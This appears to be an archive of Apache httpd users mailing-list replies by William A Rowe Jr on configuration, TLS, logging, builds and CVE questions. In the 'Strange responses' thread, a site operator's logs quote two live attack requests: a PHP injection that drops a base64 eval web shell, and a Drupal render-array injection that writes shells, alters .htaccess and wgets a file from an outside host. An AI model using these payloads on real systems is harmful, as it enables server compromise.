Re: [users@httpd] AWS Network Loadbalancer’s ProxyProtocol V2 and HTTPD mod_remoteip

[William A Rowe Jr]

Looks like it's not enabled on your listener. The global setting is not
correctly
inherited (and can lead to crashes because the merging is not handled
correctly
either.) I'd explicitly enable it in the first instance of each
 you
are configuring.

The fix is non-trivial, feel free to file a bug that "Globally set
RemoteIPProxyProtocol
is not inherited by virtual hosts".


On Thu, Oct 17, 2019 at 10:50 AM David Tkacik
 wrote:

> This is the only thing relevant to this:
>
> [Thu Oct 17 15:49:26.886038 2019] [core:debug] [pid 30279]
> protocol.c(1335): [client 172.31.38.27:59548] AH00566: request failed:
> malformed request line
>
> Thanks !
>
> On 17 Oct 2019, at 15:52, William A Rowe Jr  wrote:
>
> On Thu, Oct 17, 2019 at 9:04 AM David Tkacik <
> dtka...@healthcoachinstitute.com> wrote:
>
>>
>> But when I try to connect I’m getting 400 Bad Request
>>
>
> Change your Apache LogLevel to 'debug' and repeat the attempt, examine the
> error log and feel free to quote it here for further guidance.
>
>
>

Re: [users@httpd] Is it possible to have in Apache 2.4 VirtualHosts, each with its own SSLProtocol ?

[William A Rowe Jr]

On Thu, Oct 17, 2019 at 2:06 AM Marian Ion  wrote:

>
> Yes, that's why I set "SSLStrictSNIVHostCheck On" -> according to the
> documentation "If set to on in the default name-based virtual host,
> clients that are SNI unaware will not be allowed to access any virtual
> host".
> I set it in the default virtual host and in my "second.server" (that is
> supposed to be TLS 1.3 only) but it didn't change the behaviour (i.e.
> second.server still accepts TLS 1.2 requests...)
>

TLS revision describes the handshake protocol. Either the listener accepts
TLS 1.2 handshakes, or it does not, it won't look at SNI until the handshake
is in flight with the respective TLS handshake.

This points out the possibility of multi-homing the box with one IP which
accepts TLS 1.2+ and a different IP listening with TLS 1.3 only.

Re: [users@httpd] AWS Network Loadbalancer’s ProxyProtocol V2 and HTTPD mod_remoteip

[William A Rowe Jr]

On Thu, Oct 17, 2019 at 9:04 AM David Tkacik <
dtka...@healthcoachinstitute.com> wrote:

>
> But when I try to connect I’m getting 400 Bad Request
>

Change your Apache LogLevel to 'debug' and repeat the attempt, examine the
error log and feel free to quote it here for further guidance.

Re: [users@httpd] Can't get X-Forwarded-For to be passed through to app with apache reverse proxy

[William A Rowe Jr]

It's spelled out right in the docs, that header is consumed as decoded by
httpd, and the effective remote IP address is what it decoded. If you want
it seen by Tomcat, don't do that.

https://httpd.apache.org/docs/2.4/mod/mod_remoteip.html#processing

On Mon, Sep 23, 2019, 12:45 John Pyeatt  wrote:

> I have tried everything and I can't get Apache (2.4.39) to pass the
> X-Forwarded-For header to my tomcat (8.5) instance.
>
> I have apache listening on port 8081 and bound to the public IP address as
> a reverse proxy to a backend tomcat instance which is also bound to 8081
> but on 127.0.0.1.
> My apache instance has the following modules loaded:
>
>  proxy_module (shared)
>  proxy_connect_module (shared)
>  proxy_ajp_module (shared)
>  proxy_http_module (shared)
>  proxy_wstunnel_module (shared)
>  remoteip_module (shared)
>
> Here is my virtualhost stanza
> 
> ProxyPreserveHost On
> ProxyPass /MYAPP/admin http://127.0.0.1:8081/MYAPP/admin
> RemoteIPHeader X-Forwarded-For
> RemoteIPInternalProxy 127.0.0.0/8
> 
> ProxyAddHeaders On
> ProxyPassReverse /MYAPP/admin
> # Only allow ?cmd=spkr
> RewriteEngine On
> RewriteCond %{QUERY_STRING} !cmd=spkr
> RewriteRule .* - [F]
> 
> 
>
> According to the doc
> https://httpd.apache.org/docs/2.4/mod/mod_proxy.html#proxyaddheaders 
> ProxyAddHeaders
> On should do the trick.
>
> I've done a packet capture to see if the X-Forwarded-For header is being
> generated by Apache but dropped on the floor in Tomcat and I'm not seeing
> X-Forwarded-For header coming from Apache.
>
> The slightly weird thing is that my tomcat app is also listening on port
> 5678 using AJP and that works if I change to ProxyPass /MYAPP/admin ajp://
> 127.0.0.1:5678/MYAPP/admin. Calls to HttpRequest.getRemoteAddr() in my
> tomcat app correctly return the IP address of my client. I find it very
> hard to believe that proxy_ajp_module works fine and proxy_http_module
> somehow has a bug in it. So I must be missing some magic apache
> configuration setting.
>
>
> --
> John Pyeatt
> Software Developer
> (608) 661-1184 | john.pye...@singlewire.com
>
> [image: Singlewire-Logo-Sigstr.png] 
> www.singlewire.com | Twitter  | Facebook
>  | LinkedIn
> 
>
> *Keeping people safe and informed. Everywhere, every time.*
>
> [image: Singlewire Software Blog]
> 
> 
>

Re: [users@httpd] Apache 2.4.6 - ErrorLog

[William A Rowe Jr]

On Fri, Sep 13, 2019 at 3:46 PM Jim Albert  wrote:

> In use of CentOS7 servers and the included apache, I'm moving to
> Apache/2.4.6
>
> It appears something related to ErrorLog has changed.
> I'm using what I have always used:
> ErrorLog "logs/error_log"
>
> and I do see messages going to logs/error_log such as start/stop and
> certain types of errors such as access denied, but something simple like
> a file not found error is not getting logged outside of certain scripts
> not being found associated with SriptAlias definitions.
>
> But just a request to https://'my_web_server'/no_such_file.html does not
> get logged as not found as it used to in earlier apache. Nothing related
> to this file not being found gets printed to logs/error_log.
>
> I've checked docs on ErrorLog along with httpd.conf and .htaccess files,
> but nothing is jumping out at me as relevant to this behavior.
>
> Note LogLevel setting:
> LogLevel warn


Right, if the file isn't found the client asked for a non-existent resource.
Nothing to be "warned" of.

Try LogLevel info (or event debug) if you want to see higher resolution
details about errors caused by the client, as opposed to errors in your
configuration that the operator needs to act on.

Re: [users@httpd] Crash of httpd in Endurance

[William A Rowe Jr]

Check the respective versions of apr and apr-util, perhaps that is the
underlying change, since this is arch-specific?

You can checking any existing MaxMemFree
https://httpd.apache.org/docs/2.4/mod/mpm_common.html#maxmemfree
directive and perhaps toggle it down to 1MB (value 1024) persisting between
requests?



On Tue, Aug 27, 2019 at 10:20 PM kishore  wrote:

> Hi,
> Upon further investigation we found there is a memory leak which is
> causing increase in usage of swap memory. Once the swap memory runs out of
> space one of the child process generates a core file.
> This behavior is observed only on Solaris with 2.4.34 and above (tested 2.4
> 41 as well). HTTPS 2.4.2 9 doesn't have this issue. Is there any known
> memory leaks on Solaris Sparc 11.4 with latest Apache httpd versions.
>
> Thank you,
> Kishore
>
>
> On Fri, Aug 23, 2019, 23:27 kishore  wrote:
>
>> Hi Dennis,
>> Below is the output from pstack
>>
>> core 'core' of 28253: /F6/CA/secure-proxy/httpd/bin/httpd -d
>> /F6/CA/secure-proxy/httpd -k start -D SSL
>>
>>
>>   lwp# 1 / thread# 1  ---
>>  fff90bbe5d7c __read (8, 7fffd0eb, 1, 0, 0, 7f5a2a40)
>> + c
>>  00010006a1b8 ap_mpm_podx_check (10024d7a0, 10007cfa0, 103000,
>> 7fffd0e0, 0, 1) + 18
>>  00010007efdc child_main (c800, 1001a2920, 0, 100194b60, 10019f4c8,
>> 1002eb700) + 4b4
>>  00010007f228 make_child (1001e8b48, 2, , 2,
>> 100194b60, 0) + 178
>>  00010007f3a4 startup_children (a400, 0, 10019ef08, 48, 2, 10019f4d8)
>> + dc
>>  000100080410 worker_run (0, 1001ec868, 1001e8b48, 1001a2920,
>> 100194b60, 1) + 1d0
>>  000100036c9c ap_run_mpm (1001be678, 1001ec868, 1001e8b48, 10024d380,
>> 1001a1fe0, 100194b60) + 5c
>>  00010002ddac main (10019f280, 10019f258, 5, 10019beb8, a400,
>> 1000852f8) + e64
>>  00010002c14c _start (0, 0, 0, 0, 0, 0) + 12c
>>   lwp# 2 / thread# 2  ---
>>  fff90b034aa0 dummy_worker(), exit value = 0x
>> ** zombie (exited, not detached, not yet joined) **
>>   lwp# 3 / thread# 3  ---
>>  fff90bbe11d4 __lwp_park (100366558, 100366508, 0, 0, 0, 100366514) +
>> 14
>>  fff90bbda9f4 cond_wait_queue (100366558, 100366508, 0, 0,
>> 7f480a40, fff90bd2eb80) + 4c
>>  fff90bbdafb0 cond_wait (100366558, 100366508, 0, 0, 0, 1) + 10
>>  fff90bbdaff0 pthread_cond_wait (100366558, 100366508, 0, 0,
>> 100366508, 0) + 8
>>  00010006bb48 ap_queue_pop_something (1003664c0, 7f0fbf08, 0,
>> 7f0fbf00, 0, 0) + 50
>>  00010007d9c0 worker_thread (100366ba0, 1003da3a8, 7f36aac0,
>> 0, 100194b60, 2) + 1e4
>>  fff90bbe1148 _lwp_start (0, 0, 0, 0, 0, 0)
>>   lwp# 4 / thread# 4  ---
>>  fff90bbe11d4 __lwp_park (100366558, 100366508, 0, 12614c2a0, 0,
>> 100366514) + 14
>>  fff90bbda9f4 cond_wait_queue (100366558, 100366508, 0, 0,
>> 7f481240, fff90bd2eb80) + 4c
>>  fff90bbdafb0 cond_wait (100366558, 100366508, 0, 0, 0, 1) + 10
>>  fff90bbdaff0 pthread_cond_wait (100366558, 100366508, 0, 0,
>> 100366508, 0) + 8
>>  00010006bb48 ap_queue_pop_something (1003664c0, 7eefbee8, 0,
>> 7eefbee0, 0, 0) + 50
>>  00010007d9c0 worker_thread (100366bd0, 1003da3a8, 7f36ac10,
>> 1, 100194b60, 2) + 1e4
>>  fff90bbe1148 _lwp_start (0, 0, 0, 0, 0, 0)
>>   lwp# 5 / thread# 5  ---
>>  fff90bbe11d4 __lwp_park (100366558, 100366508, 0, 1260f21b0, 0,
>> 100366514) + 14
>>  fff90bbda9f4 cond_wait_queue (100366558, 100366508, 0, 0,
>> 7f481a40, fff90bd2eb80) + 4c
>>  fff90bbdafb0 cond_wait (100366558, 100366508, 0, 0, 0, 1) + 10
>>  fff90bbdaff0 pthread_cond_wait (100366558, 100366508, 0, 0,
>> 100366508, 0) + 8
>>  00010006bb48 ap_queue_pop_something (1003664c0, 7ecfbec8, 0,
>> 7ecfbec0, 0, 0) + 50
>>  00010007d9c0 worker_thread (100366c00, 1003da3a8, 7f36ad60,
>> 2, 100194b60, 2) + 1e4
>>  fff90bbe1148 _lwp_start (0, 0, 0, 0, 0, 0)
>>   lwp# 6 / thread# 6  ---
>>  fff90bbe11d4 __lwp_park (100366558, 100366508, 0, 0, 0, 100366514) +
>> 14
>>  fff90bbda9f4 cond_wait_queue (100366558, 100366508, 0, 0,
>> 7f482240, fff90bd2eb80) + 4c
>>  fff90bbdafb0 cond_wait (100366558, 100366508, 0, 0, 0, 1) + 10
>>  fff90bbdaff0 pthread_cond_wait (100366558, 100366508, 0, 0,
>> 100366508, 0) + 8
>>  00010006bb48 ap_queue_pop_something (1003664c0, 7eafbea8, 0,
>> 7eafbea0, 0, 0) + 50
>>  00010007d9c0 worker_thread (100366c30, 1003da3a8, 7f36aeb0,
>> 3, 100194b60, 2) + 1e4
>>  fff90bbe1148 _lwp_start (0, 0, 0, 0, 0, 0)
>>   lwp# 7 / thread# 7  ---
>>  fff90bbe11d4 __lwp_park (100366558, 100366508, 0, 12607b860, 0,
>> 100366514) + 14
>>  fff90bbda9f4 cond_wait_queue (100366558, 100366508, 0, 0,
>> 7f482a40, 

Re: [users@httpd] Compiling Apache with Non-System OpenSSL

[William A Rowe Jr]

On Wed, Jul 31, 2019 at 7:27 PM Nigel B. Peck  wrote:

>
> Setting up LD_LIBRARY_PATH in the envvars seems the best way to go in my
> case then, with the need to avoid a system-wide install. Good to have
> understood the options better.
>

w.r.t. Apache httpd, there is an installed script called apachectl. This is
the script you want to modify for additional LD_LIBRARY_PATH's and other
runtime tweaks.


> Still don’t get why pcre is found in the location provided but not
> openssl. 路‍♂️
>

Every package does things their own way, but either a pkgconfig description
exists to describe the compile and link time option flags or there might be
{package}-config script to retrieve that info. The apr and httpd projects
use 12 different ways to Sunday to get at this info and it varies from
dependency to dependency. And the details in the pkgconfig flags vary
considerably from package to package and their release to release (and also
tweaked by distribution to add extra surprises.)

So it's probably that pkgconfig for pcre sets up the -R path, while openssl
you are building does not, or httpd failed to interrogate and consume that
pkgconfig input in the openssl case, but did the right thing for pcre.

Re: [users@httpd] Issue with FastCGI module in Apache 2.4

[William A Rowe Jr]

mod_fastcgi is long abandoned and was not a part of the httpd project. A
derivative work mod_fcgid is maintained (lethargicly) by the project as a
separate download ... https://httpd.apache.org/mod_fcgid/ and a new *core*
module was introduced, mod_proxy_fcgi that is part of the standard
distribution and is more helpful to some users, since it follows the proxy
semantics. See https://httpd.apache.org/docs/2.4/mod/mod_proxy_fcgi.html



On Fri, Jul 19, 2019, 03:09 Raani Palle, Nunda
 wrote:

> Team,
>
> I am upgrading apache version from 2.0 – 32 bit to 2.4 – 64 bit on Linux.
>
>
>
> I am not able to convert the httpd.conf file to newer version.
>
> Please help.
>
> Especially I m finding difficulty in migration the variable ‘FastCgiServer’
>
>
>
> Httpd.conf in 2.0 version
>
>
>
> 
>
> AddHandler fastcgi-script .fcgi
>
>
>
> # Launch the FastCGI processes
>
> FastCgiIpcDir /tmp
>
> FastCgiServer /datlib/advantage/pc/envs/fo_b2_a/manager/bin/
> pcwww_fastcgi.pl -idle-timeout 300 -processes 3 -initial-env
> LD_LIBRARY_PATH
>
>
>
> 
>
> DocumentRoot
> /datlib/advantage/pc/envs/fo_b2_a/manager/../pc/catalyst/htdocs/
>
> ScriptAlias /fo_b2_a /datlib/advantage/pc/envs/fo_b2_a/manager/bin/
> pcwww_fastcgi.pl/
>
> 
>
>
>
> 
>
>
>
>
>
> Thanks
>
> Nunda.
>
>
> --
> This message w/attachments (message) is intended solely for the use of the
> intended recipient(s) and may contain information that is privileged,
> confidential or proprietary. If you are not an intended recipient, please
> notify the sender, and then please delete and destroy all copies and
> attachments, and be advised that any review or dissemination of, or the
> taking of any action in reliance on, the information contained in or
> attached to this message is prohibited.
> Unless specifically indicated, this message is not an offer to sell or a
> solicitation of any investment products or other financial product or
> service, an official confirmation of any transaction, or an official
> statement of Sender. Subject to applicable law, Sender may intercept,
> monitor, review and retain e-communications (EC) traveling through its
> networks/systems and may produce any such EC to regulators, law
> enforcement, in litigation and as required by law.
> The laws of the country of each sender/recipient may impact the handling
> of EC, and EC may be archived, supervised and produced in countries other
> than the country in which you are located. This message cannot be
> guaranteed to be secure or free of errors or viruses. Attachments that are
> part of this EC may have additional important disclosures and disclaimers,
> which you should read. By messaging with Sender you consent to the
> foregoing.
>

Re: [users@httpd] Apache HTTP Server Prior to 2.4.12 Multiple Vulnerabilities

[William A Rowe Jr]

On Tue, Jun 18, 2019 at 6:41 AM Richard 
wrote:

>
> > Date: Tuesday, June 18, 2019 05:38:50 +
> > From: Satish Chhatpar 02 
> >
> > How to patch Apache 2.4.6 to latest release on RHEL 7.4?
> >
>
> RedHat backports patches to the base version, keeping the version
> number stable within an OS release. I.e., RH-7 will maintain the
> 2.4.6 httpd version number. You need to look at the number after that
> (currently 2.4.6-89) to see the incremental change numbering. You can
> look up the CVEs against RH's change log and/or update announcements
> for a package to see that an issue has been addressed. From what I
> have seen, RH tends to have updated httpd packages out very quickly
> following a vulnerability announcement.
>
> By the way, RH-7 is currently at .6, which came out late last year. A
> .4 system is missing about 18 months of updates.
>

Alternately, look at the RHSCL repos for httpd24, which offers a far more
modern version of httpd, of other server and proxy software, and commonly
used web content authoring languages;

https://access.redhat.com/documentation/en-us/red_hat_software_collections/3/html/3.3_release_notes/sect-RHSCL-Features#tabl-RHSCL-Components

Re: [users@httpd] Can't connect to server on 443 ... no log information being generated

[William A Rowe Jr]

On Mon, Jun 3, 2019 at 11:08 PM Geoff Russell 
wrote:

> Hi Douglas,
>
> Thanks for your help.   I've spent about 6 hours on this problem and it
> has just vanished ...
>
> I tried elinks as a substitute for telnet ... telnet does succeed in the
> socket handshake, to is useful for quick test of that part of the
> connection.
>

Just for future reference, openssl s_client is the usual way to test the
connection stack to the server, which gives you the options to force
specific versions of tls, specific ciphers, etc.

Re: [users@httpd] Receive openssl library version mismatch when enabling mod_ldap ??!!

[William A Rowe Jr]

You need to build OpenLDAP against the OpenSSL in use (this is also true of
curl for mod_md.) Every bit including APR-util are all going to need to
agree on the flavor of OpenSSL in use.



On Fri, May 3, 2019, 14:12 ken edward  wrote:

> Hello,
>
> I successfully built a FIPS openssl based mod_ssl for Apache 2.4.39.
> Everything works great via SSL when I boot Apache, EXCEPT when I then
> turn on mod_ldap/mod_authnz_ldap, THEN I get the below openssl library
> version mismatch. The SSL will still work, but it display the below
> warning.
>
> I tried to rebuild apr-util with openssl  +ldap and integrate with the
> apache build but same issues... any ideas???
>
>
> LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
> LoadModule ldap_module modules/mod_ldap.so
>
> [Fri May 03 14:59:56.611785 2019] [ssl:warn] [pid 5119] AH01882: Init:
> this version of mod_ssl was compiled against a newer library (OpenSSL
> 1.0.2r  26 Feb 2019, version currently loaded is OpenSSL 1.0.0-fips 29
> Mar 2010) - may result in undefined or
>  erroneous behavior
> [Fri May 03 14:59:56.661788 2019] [ssl:notice] [pid 5119] AH01884:
> Operating in SSL FIPS mode
> [Fri May 03 14:59:56.690429 2019] [ssl:warn] [pid 5120] AH01882: Init:
> this version of mod_ssl was compiled against a newer library (OpenSSL
> 1.0.2r  26 Feb 2019, version currently loaded is OpenSSL 1.0.0-fips 29
> Mar 2010) - may result in undefined or
>  erroneous behavior
> [Fri May 03 14:59:56.739818 2019] [ssl:notice] [pid 5120] AH01884:
> Operating in SSL FIPS mode
> [Fri May 03 14:59:56.744802 2019] [mpm_prefork:notice] [pid 5120]
> AH00163: Apache/2.4.39 (Unix) OpenSSL/1.0.0-fips configured --
> resuming normal operations
>
>
> BUILT APR-UTIL:
> ./configure -prefix=/u01/tomcat/scm2/apr-util-1.6.1
> --with-apr=/u01/tomcat/scm2/apr-1.6.5 --with-ldap --with-crypto
> --with-openssl=/u01/tomcat/scm2/openssl-1.0.2r
> LDFLAGS=-L/u01/tomcat/scm2/openssl-fips-2.0.16/lib
> -L/u01/tomcat/scm2/openssl-1.0.2
> r/lib
>
> BUILT httpd apache 2.4.39
> ./configure --prefix=/u01/tomcat/scm2/apache2.4.39kerb2
> --with-ssl=/u01/tomcat/scm2/openssl-1.0.2r --with-mpm=prefork
> --with-ldap --with-apr=/u01/tomcat/scm2/apr-1.6.5
> --with-apr-util=/u01/tomcat/scm2/apr-util-1.6.1 --enable-ssl
> --enable-dav --en
> able-dav-fs --enable-dav-lock --enable-authnz-ldap --enable-ldap
> -enable-headers CPPFLAGS=-DHAVE_FIPS
> LDFLAGS=-L/u01/tomcat/scm2/openssl-fips-2.0.16/lib
> -L/u01/tomcat/scm2/openssl-1.0.2r/lib
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Ssl certificate ignored in virtual host

[William A Rowe Jr]

On Wed, Apr 17, 2019 at 4:08 PM Rose, John B  wrote:

> Why would ssl.conf certificate settings override the certificate settings
> in a specific virtual host config file?
>

The concept is inheritance. Picture all the #include'ed .conf files
flattened at the global scope, unless you actually do an include within a
specific .

Basically, what you set outside of all the specific  blocks
applies globally to all hosts, unless you override them. There are quirky
cases like rewrite and some of ssl which don't auto-inherit the globals,
but for the most part, what gets set outside of  apply to all
situations that aren't explicitly overridden.

Re: [users@httpd] Unexpected result of requesting client certificate when requesting locations with different SSLVerifyClient settings

[William A Rowe Jr]

On Wed, Apr 10, 2019 at 7:30 PM Du Hao  wrote:

> Is Apache HTTP Server going to drop TLSv1.2 support in near future? If
> not, it is a bug that affects user who voluntarily choose to not use
> TLSv1.3.
>

Because 2.4 dates all the way back to the now-unsupported 0.9.8 lifecycle,
it seems unlikely that any httpd 2.4.x would entirely drop this or later
support, but note these EOL dates from the OpenSSL project as published at
https://www.openssl.org/policies/releasestrat.html

The next version of OpenSSL will be 3.0.0.
Version 1.1.1 will be supported until 2023-09-11 (LTS).
Version 1.1.0 will be supported until 2019-09-11.
Version 1.0.2 will be supported until 2019-12-31 (LTS).
Version 1.0.1 is no longer supported.
Version 1.0.0 is no longer supported.
Version 0.9.8 is no longer supported.

So it's entirely reasonable that any 2.next or 3.0 release of Apache HTTP
Server by midyear could elect to drop all support for any 1.0.1 or earlier
flavor, and if not released until next year - could might even drop support
for all flavors earlier than 1.1.1. Not certain what course the project
will choose to follow, since these antique flavors are still found across
many flavors of commonly provisioned OS's.

Best practices and PCI standards already discourage and will eventually
forbid the use of context-specific renegotiation, and will eventually drop
TLS 1.2 itself. Some useful information on such guidelines are summarized
and maintained at https://en.wikipedia.org/wiki/Transport_Layer_Security

Re: [users@httpd] Unexpected result of requesting client certificate when requesting locations with different SSLVerifyClient settings

[William A Rowe Jr]

On Wed, Apr 10, 2019 at 10:48 AM Du Hao  wrote:

>
> I suspect there is a bug involved in the SSL client verification type
> changing and the re-negotiation flow. While I admit it may be a corner case
> but the original use case is very crucial to my current user base. I
> checked the Bug database and there is a similar bug except that is related
> to TLSv1.3. For browser compatibility, I am currently disabling TLSv1.3,
> although I am testing with Apache 2.4.38 and OpenSSL 1.1.1b.
> I would love to hear any suggestions on an alternative configuration to
> support my scenario, and thank you very much in advance.
>

Hello Du Hau,

you probably want to abandon your current approach. With TLSv1.3, which
will come to dominate and eliminate earlier TLS protocols, there is no
mechanism for renegotiation. The entire site (defined using SNI, server
name indication) will need to share a common handshake, the idea of only
locking down https://site.example.co/protected/ gets eliminated with this
protocol, and with many only TLS's which actively disable renegotiation due
to the underlying potential security holes over time.

Re: [users@httpd] Re: CVE-2019-0211/0215/0217

[William A Rowe Jr]

In general, problems which stretch back to the initial 2.4.1 or commonly
deployed 2.4.3 might also affect 2.2.x or 2.0.x. As users have had almost a
decade to adjust and these versions are EOL, the project seems unlikely to
care, and notices are everywhere that the old flavors are no longer
evaluated for the impact of any defects, security or otherwise. Vendors who
support older flavors are on their own to make such evaluations themselves.

And in general, when a later, specific flavor of 2.4.x (e.g. 2.4.17) is
cited as the first version impacted, that version is expected to be the one
where a defect was introduced.

There is the edge case that a problem could exist, then be fixed or masked
sometime before 2.4.1, and later be reintroduced during 2.4.x, but the
rules above should generally apply.

On Sun, Apr 7, 2019, 02:38 @lbutlr  wrote:

> On 6 Apr 2019, at 08:59, Sunhux G  wrote:
> > Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
> > & other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
> > affected?
>
> The CVE lists, explicitly, what versions are affected.
>
> "The flaw was discovered by Charles Fol and impacts all Apache HTTP Server
> releases from 2.4.17 to 2.4.38. The issue has been addressed with the
> release of Apache httpd 2.4.39"
>
> Also, as you should be aware, Apache 2.0 and Apache 2.2 are both
> End-of-life and not supported any longer.
>
>
> --
> Love is like oxygen / You get too much / you get too high / Not enough
> and you're gonna die
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Strange responses

[William A Rowe Jr]

The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'?
Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?'
query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto  wrote:

> Hi,
>
> I operate my site with httpd 2.4.39 with ssl option.
>
> Yesterday, strange responses were observed.
>
> My site received the following abuse requests.  Except the following
> requests, the httpd return 404 error to obvious abuse requets. However,
> as to the following two queries, the httpd seemed to return a message
> when it receives 'GET /' with 200 status.  I  expect the httpd should
> return 404 error.
>
> Case 1:
> GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>
> HTTP/1.1
>
> Case 2:
> POST
>
> /?q=user%2Fpassword%5B%23post_render%5D%5B%5D=passthru%5B%23type%5D=markup%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%
> 2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
> HTTP/1.1
>
> It would be very appriciated if someone could advise me.
>
> Thank you.
>
> Yours truly,
>
> Kazuhiko Kohmoto
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] Apache httpd 2.4.39 GA for Windows

[William A Rowe Jr]

On Tue, Apr 2, 2019 at 2:35 AM Steffen 
wrote:

> The ASF HTTPD project did not mention security vulnerabilities fixed in
> the initial changelog 2.4.39.


To be 100% accurate, the ASF HTTP Server project had not announced the
release of 2.4.39. It had concluded a vote, but only the RM's announcement
triggers the release. There is a delay for the RM to stage the artifacts so
they
can be downloaded by anyone from our entire array of mirror sites. And in
that time, the RM could even pull the release owing to a serious packaging
glitch, if they should need to (this happened not so long ago at httpd.)

You jumped the gun by pre-announcing your package as a "release", ahead
of the RM's announce and ahead of downloads from the ASF, which is poor
form to say the least.

Security issues are embargoed until that announcement is broadcast by
the RM to the entire public at once. The project will not mention security
vulnerabilities fixed until that moment.

This isn't to say you shouldn't assemble your release of version x.y.z based
on the vote candidate; in fact any change to that source package will always
trigger version x.y.z+1, so there is no risk that your build varies from
the final
announced package. Be ahead of the game preparing your binary package,
but defer any publicity until after the actual announcement.

Re: [users@httpd] WAMP64 Apache2.4 & PHP 5.2?

[William A Rowe Jr]

On Tue, Jan 29, 2019, 14:16 Jerry Malcolm  On 1/29/2019 12:31 PM, William A Rowe Jr wrote:
>
> On Tue, Jan 29, 2019 at 12:27 PM Jerry Malcolm 
> wrote:
>
>> I'm running a very recent version of WAMP x64.  I inherited an 'ancient'
>> php app that requires php 5.2 and no higher.   I went through the
>> process of adding php 5.2 to WAMP, and I copied php5apache2_4.dll from
>> php 5.6 folder and did the other things in the instructions to add a php
>> version to WAMP.  But now apache won't start and says it can't find the
>> php5apache2_4.dll file.
>>
>> I've seen several posts about this error message, but they all reference
>> different versions.  And I know the dll is good since it works fine on
>> php 5.6.
>>
>> My question is... is Win64 Apache 2.4 and php 5.2 a valid combination?
>> I don't want to continue beating my head against the wall only to find
>> out that this combination is simply not possible.  If it is valid, then
>> I'll continue debug.  If not, I'm in a mess... but it's not a
>> configuration issue...
>>
>
> You can never combine 32 bit loadable modules in a 64 bit Apache
> httpd process. That means x64 is going to require mod_php 64 bit
> built against the 64 bit httpd 2.4 and 64 bit php 5.2, in your example.
>
> The sysinternals tool depends.exe for 64 bit can quickly show you
> missing dependencies, and whether the loaded exe/dll/so file was
> 64 or 32 bits.
>
> Thanks for the quick response, William.
>
> It appears that the answer to my question is that there is NOT an x64 php
> 5.2.  It is only 32 bit.  (64-bit started with 5.3). I found a link on
> ApacheLounge to a personally-built x64 php 5.2.  But the link is dead.
> Does anybody else have a private-built x64 php 5.2?
> Alternative, has anybody had any experience with running both a 32-bit
> Apache and 64-bit WAMP on the same box? Or is that even possible?  I know
> I'd need to have one on different ports, but I could redirect certain urls
> to the other port.  Is this a horrible idea?
>

It's actually not a horrible idea. The PHP project strongly encourages
admins to host their content using the PHP fcgi sapi. Route to a pool of
5.2 hosts (32 bit, this is out of process) using either mod_proxy_fcgi or
mod_fcgid. Do the same to a pool of 5.6 hosts for modern apps. These are
all distinct processes and httpd is just moving the traffic, not generating
the dynamic content.

Re: [users@httpd] WAMP64 Apache2.4 & PHP 5.2?

[William A Rowe Jr]

On Tue, Jan 29, 2019 at 12:27 PM Jerry Malcolm 
wrote:

> I'm running a very recent version of WAMP x64.  I inherited an 'ancient'
> php app that requires php 5.2 and no higher.   I went through the
> process of adding php 5.2 to WAMP, and I copied php5apache2_4.dll from
> php 5.6 folder and did the other things in the instructions to add a php
> version to WAMP.  But now apache won't start and says it can't find the
> php5apache2_4.dll file.
>
> I've seen several posts about this error message, but they all reference
> different versions.  And I know the dll is good since it works fine on
> php 5.6.
>
> My question is... is Win64 Apache 2.4 and php 5.2 a valid combination?
> I don't want to continue beating my head against the wall only to find
> out that this combination is simply not possible.  If it is valid, then
> I'll continue debug.  If not, I'm in a mess... but it's not a
> configuration issue...
>

You can never combine 32 bit loadable modules in a 64 bit Apache
httpd process. That means x64 is going to require mod_php 64 bit
built against the 64 bit httpd 2.4 and 64 bit php 5.2, in your example.

The sysinternals tool depends.exe for 64 bit can quickly show you
missing dependencies, and whether the loaded exe/dll/so file was
64 or 32 bits.

Re: [users@httpd] Urgent: Need to compress only above 1MB files in Apache webserver

[William A Rowe Jr]

Compression on-the-fly is generally unwise. Incrementally better
compression comes at an escalating server cpu penalty. There might be some
way to trigger mod_deflate using mod_lua or mod_rewrite if you were
adventurous, but see this page for info about expr tests for filesize you
can use to toggle the no-brotli and no-gzip flags if you want to try
something straightforward; http://httpd.apache.org/docs/2.4/expr.html

For static content, the right solution is to use mod_negotiation to
transparently serve either brotli or gzip files on the fly based on the end
users accept-encoding request header. It would be nonsense to compress all
such 1mb content on the fly, so instead you provision all three files
alongside one another. E.g. index.html.nc, index.html.gz and index.html.br
reside in the same directory, and the request comes in for index.html
triggering a search for the best match. Your provisioning scripts decide to
create (or update stale) .gz and .br copies of the content to serve
compressed. This wastes zero cpu resource serving the responses, and where
there are no .gz or .br compressed files, the single cleartext flavor will
be served.

This also means there is no compression of dynamic content, however, unless
it is served to the httpd gateway already compressed. Since there is no
